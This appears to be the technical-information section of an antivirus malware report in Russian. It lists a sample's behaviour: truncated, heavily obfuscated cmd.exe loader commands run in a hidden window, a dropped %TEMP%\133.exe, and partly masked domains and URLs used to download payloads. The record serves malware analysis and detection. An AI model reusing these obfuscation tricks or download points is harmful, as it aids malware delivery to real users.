Техническая информация
- '<SYSTEM32>\cmd.exe' /c fO^r , /^F ; , " delims=zWef tokens= +1 " ; %^F ; ; in , , ( , ' , , FTYP^^E ; , ^| ; , FInd^^sTr ; ; df^^il ' , ; ) , ; d^O ; %^F; , , jTq/v^X^LFv^EQ6i ^ ; , 5JMh/^R ...
- %TEMP%\133.exe
- %TEMP%\133.exe
- 'fu####spirits.com':80
- 'fu####spirits.com':443
- 'ra###swave.com':80
- 'me####market.com':80
- 'yu###hua.com':80
- http://www.fu####spirits.com/7mc33tD
- http://www.ra###swave.com/wp-content/uploads/RaO7vU
- http://www.yu###hua.com/OqKEEY
- 'fu####spirits.com':443
- DNS ASK fu####spirits.com
- DNS ASK ra###swave.com
- DNS ASK me####market.com
- DNS ASK yu###hua.com
- DNS ASK sh##hana.ge
- '<SYSTEM32>\cmd.exe' /c fO^r , /^F ; , " delims=zWef tokens= +1 " ; %^F ; ; in , , ( , ' , , FTYP^^E ; , ^| ; , FInd^^sTr ; ; df^^il ' , ; ) , ; d^O ; %^F; , , jTq/v^X^LFv^EQ6i ^ ; , 5JMh/^R ...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c FTYP^E | FInd^sTr df^il
- '<SYSTEM32>\cmd.exe' /S /D /c" FTYPE "
- '<SYSTEM32>\findstr.exe' dfil
- '<SYSTEM32>\cmd.exe' ; , , jTq/vXLFvEQ6i ; , 5JMh/R " , ; ( , (Se^T [^-'=Oobx-^(a;.Xms^/T}tyj^+Iiqg@dkr1KU 7\^D{An^P^YESF^f^8,W^lQp=u^:3e'h^)LwMvR$NB^Cc) , )&& , f^Or ; ; %^m ; , ^in ; ; ( , ...